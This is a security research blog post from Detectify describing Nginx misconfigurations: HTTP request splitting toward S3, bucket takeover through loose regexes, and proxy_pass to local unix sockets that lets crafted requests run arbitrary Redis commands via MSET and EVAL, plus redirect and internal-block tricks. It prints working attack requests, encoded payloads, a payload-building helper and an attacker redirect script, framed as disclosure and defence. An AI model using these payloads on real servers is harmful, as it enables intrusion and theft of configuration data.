
Middleware, middleware everywhere - and lots of misconfigurations to fix

Frans Rosén / February 18, 2021

tl;dr Detectify Crowdsource found some interesting middleware misconfigurations and potential exploits that, if left unchecked, leave your web applications vulnerable to attack.

Last year, Detectify’s security research team looked at various middleware, primarily Nginx-based web servers, load balancers and proxies. We found some fun stuff. Some of these issues are most likely known already, but others were new to us, so we wanted to share what we found. Because bug bounties enable widespread research, we were able to confirm that many of these cases actually occur in the wild. Gixy, a project created by Yandex, detects many of these middleware misconfigurations, but not all of them.

So, let’s begin.

Exploiting HTTP Splitting with cloud storage

HTTP splitting is not a new thing and has been covered before multiple times. It is also a part of the OWASP-checklist. However, we’ve seen an increasing number of hosts utilizing proxy-solutions for static content against Google Cloud Storage and AWS S3 on /media/, /images/, /sitemap/ and similar locations. If the regular expressions are weak in these cases, they allow the good ol’ HTTP splitting to happen. Cloud storage services, which mainly use the Host-header to decide which bucket to serve from, are a perfect candidate to have on the other end of the proxy to be able to exploit it.

Let’s say you have a web server and want to proxy to external content on specific paths. One example of this could be media assets hosted on S3, or a completely different app under yourdomain.com/docs/.

One configuration you could do (hint: don’t) might look like this:

location ~ /docs/([^/]*/[^/]*)? {
    proxy_pass https://bucket.s3.amazonaws.com/docs-website/$1.html;
}

In this case, any URL under yourdomain.com/docs/ would be served from S3. The regular expression states that yourdomain.com/docs/help/contact-us would fetch the S3-object located at:

https://bucket.s3.amazonaws.com/docs-website/help/contact-us.html

Now, the problem with this regular expression is that it also allows newlines by default. In this case, the [^/]* part actually also matches encoded newlines, and when the regular expression group is passed into proxy_pass, the group will be url-decoded. This means that the following request:

GET /docs/%20HTTP/1.1%0d%0aHost:non-existing-bucket1%0d%0a%0d%0a HTTP/1.1
Host: yourdomain.com

Would actually make the following request from the web server to S3:

GET /docs-website/ HTTP/1.1

.html HTTP/1.0
Host: bucket.s3.amazonaws.com

This makes S3 fetch content from the bucket called non-existing-bucket1 instead. The response in this case would be S3’s NoSuchBucket error, reflected on yourdomain.com.


This bug was found in the wild multiple times on bug bounty programs. The result is same-domain injection of arbitrary content.
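The splitting behavior can be sketched offline. The snippet below is a hypothetical Python re-implementation of nginx’s decode-match-substitute steps, for illustration only:

```python
import re
from urllib.parse import unquote

# nginx matches location regexes against the *decoded* URI, and a negated
# character class like [^/] happily matches CR/LF characters:
raw = "/docs/%20HTTP/1.1%0d%0aHost:non-existing-bucket1%0d%0a%0d%0a"
path = unquote(raw)
m = re.match(r"/docs/([^/]*/[^/]*)?", path)

# the capture (embedded CRLFs and all) is substituted into proxy_pass,
# splitting the upstream request:
upstream_request = f"GET /docs-website/{m.group(1)}.html HTTP/1.0"
print(upstream_request.splitlines()[0])  # GET /docs-website/ HTTP/1.1
```

The first line of the resulting upstream request is exactly the injected one, pushing the intended `.html` suffix below the attacker-controlled Host header.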



Gixy does identify the issue when the regular expression in the location also captures newlines. However, there are other cases where Gixy cannot know the impact of letting an attacker control parts of the path. We’ve seen issues with Nginx configs like this:

location ~ /images([0-9]+)/([^\s]+) {
    proxy_pass https://s3.amazonaws.com/companyname-images$1/$2;
}

In this case, the company used multiple buckets, one for /images1/ and one for /images2/. However, since the regular expression allowed any number, providing a much larger number in the URL let us register a new, unclaimed bucket and serve our own content from it, such as yourcompany.com/images999999/ below:
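The overly permissive digit capture can be demonstrated in isolation (a hypothetical Python reproduction of the location regex and bucket-name substitution above):

```python
import re

# The digit capture in the location regex is unbounded, so *any* numeric
# suffix resolves to a bucket name:
location_re = re.compile(r"/images([0-9]+)/([^\s]+)")

m = location_re.match("/images999999/logo.png")
bucket = f"companyname-images{m.group(1)}"
print(bucket)  # companyname-images999999
```

If companyname-images999999 is unclaimed on S3, an attacker can register it and serve arbitrary content under the company’s own domain.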


Controlling proxied host

In some setups, a matching path is used as part of the hostname to proxy to:

location ~ /static/(.*)/(.*) {
    proxy_pass http://$1-example.s3.amazonaws.com/$2;
}

In this case, any URL under yourdomain.com/static/js/ would be served from S3, from the corresponding js-example bucket. The regular expression states that yourdomain.com/static/js/app-1555347823-min.js would fetch the S3-object located at:

http://js-example.s3.amazonaws.com/app-1555347823-min.js

Since the bucket name is attacker-controlled (it comes from the URI path), this leads to XSS, but it also has further implications.

The proxy_pass feature in Nginx supports proxying requests to local unix sockets. What might be surprising is that the URI given to proxy_pass can be prefixed with http:// or with a UNIX-domain socket path, specified after the word unix and enclosed in colons:

proxy_pass http://unix:/tmp/backend.socket:/uri/;

This means that in our example, we could make proxy_pass connect to a local unix socket and control parts of the data that would be sent to it. The impact of this varies depending on what listens on the socket, but in many cases it’s far from harmless.

Let’s take a look at how such a setup could be used to send arbitrary commands to (and read responses from) redis hosted on a local unix socket. The following assumes that the permissions on the redis socket allow the Nginx user to connect.

Current mitigations

SSRF/XSPA attacks against redis are nothing new, and the redis team has put mitigations in place to avoid such attacks. The following conditions will make redis close the connection and stop parsing commands:

  1. The line starts with POST
  2. The line starts with Host:

The first one mitigates the classic scenario where an attacker would use the request body to send commands. The second mitigates any HTTP based attacks (at least the ones with payloads below the Host-header). However, if we could somehow use the first line of the request to issue redis commands, this mitigation could be bypassed.
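The two guard conditions can be sketched as a toy check (this is a behavioral sketch of the protection described above, not redis’s actual source code):

```python
# A behavioral sketch of redis's inline-protocol guard:
def redis_drops_line(line: str) -> bool:
    """redis closes the connection if an inline command line looks like HTTP."""
    return line.startswith("POST") or line.startswith("Host:")

# classic body- and header-based smuggling attempts are cut off...
assert redis_drops_line("POST /exploit HTTP/1.1")
assert redis_drops_line("Host: internal-redis")
# ...but a first line that is itself a valid redis command passes through:
assert not redis_drops_line('MSET hacked "true"')
```

The gap is exactly the one the rest of this section exploits: nothing stops the *request line itself* from being a redis command.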

To see if this was possible, we set up a local Unix socket using socat:

$ socat UNIX-LISTEN:/tmp/mysocket STDOUT

and an Nginx server configured with the bug:

location ~ /static/(.*)/(.*.js) {
    proxy_pass   http://$1-example.s3.amazonaws.com/$2;
}

For this request:

GET /static/unix:%2ftmp%2fmysocket:TEST/app-1555347823-min.js HTTP/1.1
Host: example.com

The socket receives this information:

GET TEST-example.s3.amazonaws.com/app-1555347823-min.js HTTP/1.0
Host: localhost
Connection: close

What happened here? The breakdown:

  1. Full proxy_pass URI becomes http://unix:/tmp/mysocket:TEST-example.s3.amazonaws.com/app-1555347823-min.js
  2. The first part of data sent to the socket is the HTTP request method GET
  3. The second part is the data we specified as TEST
  4. The third part is the hardcoded -example.s3.amazonaws.com/
  5. The fourth part is the filename, or the second group in the matching regex app-1555347823-min.js
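The breakdown above can be replayed offline (a hypothetical Python re-implementation of nginx’s regex capture, proxy_pass substitution, and unix: prefix parsing, for illustration only):

```python
import re
from urllib.parse import unquote

# nginx decodes the URI before matching the location regex
path = unquote("/static/unix:%2ftmp%2fmysocket:TEST/app-1555347823-min.js")
m = re.match(r"/static/(.*)/(.*\.js)", path)

# proxy_pass substitutes the captures into the upstream URI...
upstream = f"http://{m.group(1)}-example.s3.amazonaws.com/{m.group(2)}"
# ...and recognizes the unix:<path>: prefix, splitting socket path from URI
sock = re.match(r"http://unix:(.*?):(.*)", upstream)
request_line = f"GET {sock.group(2)} HTTP/1.0"
print(sock.group(1))   # /tmp/mysocket
print(request_line)    # GET TEST-example.s3.amazonaws.com/app-1555347823-min.js HTTP/1.0
```

The output matches the data observed on the socket: the attacker-controlled TEST lands at the very start of the request line’s URI.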

Great! Surely we can just use the request method together with the injected part (TEST above) to form a redis command, and comment out the rest?

Well, sadly there are no comments in redis. Even though we can insert spaces to turn the hardcoded bucket suffix and the filename into extra arguments to the command, redis is very strict with regards to argument types and counts.

We’re out of luck using the request body or other headers too, since Nginx will always append the Host header directly after the first request line, which, as mentioned above, makes redis drop the connection and stop the attack.

Redis key overwrite

Luckily, redis commands accepting a variable number of arguments do exist. MSET (https://redis.io/commands/mset) takes a variable number of keys and values:

MSET key1 "Hello" key2 "World"
GET key1
GET key2

In other words, we can use a request such as this to write any key:

MSET /static/unix:%2ftmp%2fmysocket:hacked%20%22true%22%20/app-1555347823-min.js HTTP/1.1
Host: example.com

Resulting in the following data on the socket (to redis):

MSET hacked "true" -example.s3.amazonaws.com/app-1555347823-min.js HTTP/1.0
Host: localhost
Connection: close

And checking redis for the hacked key:

> get hacked
"true"

Great! We have confirmed that we can write any keys. But what about issuing commands which do not accept a variable number of arguments?
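Building such a payload can be scripted. The helper below is hypothetical (the smuggle_path name and the static .js suffix are ours), but the percent-encoding matches the request above; the trailing space in the payload separates our command arguments from the hardcoded bucket suffix:

```python
from urllib.parse import quote

# Hypothetical helper: percent-encode an inline redis payload into the
# vulnerable /static/ path from the earlier nginx config.
def smuggle_path(socket_path: str, payload: str) -> str:
    return ("/static/unix:" + quote(socket_path, safe="")
            + ":" + quote(payload) + "/app-1555347823-min.js")

path = smuggle_path("/tmp/mysocket", 'hacked "true" ')
print(path)
# /static/unix:%2Ftmp%2Fmysocket:hacked%20%22true%22%20/app-1555347823-min.js
```

Sending this path with MSET as the HTTP request method reproduces the request shown above (up to the hex case of the percent-encoding).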

Arbitrary Redis command execution

Enter: the Redis EVAL command.

It turns out that the Redis EVAL command takes a variable number of arguments too:

  • The first argument of EVAL is a Lua 5.1 script.
  • The second argument of EVAL is the number of arguments that follows the script (starting from the third argument) that represents Redis key names.
  • All the additional arguments should not represent key names and can be accessed by Lua using the ARGV global variable.

We can execute Redis commands from EVAL using two different Lua functions:

  • redis.call()
  • redis.pcall()

Let’s try using EVAL to overwrite the maxclients config key:

EVAL /static/unix:%2ftmp%2fmysocket:%22return%20redis.call('config','set','maxclients',1337)%22%200%20/app-1555347823-min.js HTTP/1.1
Host: example.com

Resulting in:

EVAL "return redis.call('config','set','maxclients',1337)" 0 -example.s3.amazonaws.com/app-1555347823-min.js HTTP/1.0
Host: localhost
Connection: close

And checking the maxclients key after the request:

> config get maxclients
1) "maxclients"
2) "1337"

Great! We can issue arbitrary redis commands. There’s just one last problem: none of these commands produces a valid HTTP response, so Nginx will not forward the command output to the client, but instead returns a generic 502 Bad Gateway error.

So how do we extract data?

Reading Redis output

To our surprise, we can avoid the 502 error by simply having the string HTTP/1.0 200 OK anywhere in the response, and the full response from Redis will be forwarded to the client. Even if it’s not the first line of the response!

To make sure the response from Redis always contains that string, we can use string concatenation in the Lua script.

Example extracting response from CONFIG GET * command:

EVAL /static/unix:%2ftmp%2fmysocket:'return%20(table.concat(redis.call("config","get","*"),"\n").."%20HTTP/1.1%20200%20OK\r\n\r\n")'%200%20/app-1555347823-min.js HTTP/1.1
Host: example.com

Resulting in:

EVAL 'return (table.concat(redis.call("config","get","*"),"\n").." HTTP/1.1 200 OK\r\n\r\n")' 0 -example.s3.amazonaws.com/app-1555347823-min.js HTTP/1.0
Host: localhost
Connection: close

And the output is forwarded to the client:
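The full decode-and-rewrite chain for this request can be replayed offline (a hypothetical Python re-implementation of nginx’s substitution, for illustration only; the backslash sequences in the Lua script are literal characters, not control codes):

```python
import re
from urllib.parse import unquote

encoded = (
    "/static/unix:%2ftmp%2fmysocket:"
    "'return%20(table.concat(redis.call(\"config\",\"get\",\"*\"),\"\\n\")"
    "..\"%20HTTP/1.1%20200%20OK\\r\\n\\r\\n\")'"
    "%200%20/app-1555347823-min.js"
)
path = unquote(encoded)
m = re.match(r"/static/(.*)/(.*\.js)", path)
upstream = f"http://{m.group(1)}-example.s3.amazonaws.com/{m.group(2)}"
sock = re.match(r"http://unix:(.*?):(.*)", upstream)

# The EVAL "request method" plus the rewritten URI become one inline redis command:
inline_command = f"EVAL {sock.group(2)} HTTP/1.0"
```

The Lua concatenation guarantees the string HTTP/1.1 200 OK appears somewhere in redis’s reply, which is what convinces Nginx to forward it to the client.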


Following redirects

Now, we can take this a step further. If you want proxy_pass to follow redirects instead of passing them on to the client, there is no built-in setting for that. However, a lot of examples (hello StackOverflow) show that you could do the following (hint: don’t):

location ~ /images(.*) {
    proxy_intercept_errors on;
    proxy_pass http://example.com$1;
    error_page 301 302 307 303 = @handle_redirects;
}

location @handle_redirects {
    set $original_uri $uri;
    set $orig_loc $upstream_http_location;
    proxy_pass $orig_loc;
}

This basically says that if the origin host responds with a 301, Nginx takes the Location header and passes it into another proxy_pass inside @handle_redirects. This means that if this sort of rewrite is in place and an open redirect exists at the origin, we control the full proxy_pass target. It does require the origin host to redirect even when we use the EVAL HTTP method, but as shown above, if we can point the request at a malicious origin, we can make sure it redirects an EVAL request back to the unix socket:

On the attacker-controlled origin, any 404 or 405 is rewritten into a 301 served by index.php:

error_page 404 405 =301 @405;
location @405 {
    try_files /index.php?$args /index.php?$args;
}

and index.php issues the redirect back to the unix socket:

header('Location: http://unix:/tmp/redis.sock:\'return (table.concat(redis.call("config","get","*"),"\n").." HTTP/1.1 200 OK\r\n\r\n")\' 1 ', true, 301);


Accessing internal Nginx blocks

By using the X-Accel-Redirect response header, we can make Nginx redirect internally to serve another config block, even ones marked with the internal directive:

location /internal_only/ {
    internal;
    root /var/www/html/internal/;
}

Accessing localhost restricted Nginx blocks

By using a hostname with a DNS A record pointing to 127.0.0.1, we can make proxy_pass connect to Nginx blocks that only allow localhost:

location /localhost_only/ {
    allow 127.0.0.1;
    deny all;
    root /var/www/html/internal/;
}


Middleware plays a crucial role in enabling your web server platform to provide the web services modern web applications need. Yet the ubiquity and usefulness of middleware also mean there are potential pitfalls to avoid, especially if you’re running on an open source platform like Nginx.

How can Detectify help?

Detectify can detect all of the middleware misconfigurations discussed here, and more beyond the OWASP Top 10. Start checking for these vulnerabilities and find them before someone else exploits them. Sign up for a free 2-week trial of Detectify today to get started.


Frans Rosen (@fransrosen)
Detectify Co-founder and Security Advisor

Mathias Karlsson (@avlidienbrunn)
Detectify Co-founder and Security Advisor

Fredrik Nordberg Almroth (@almroot)
Detectify Co-founder and Head of Engineering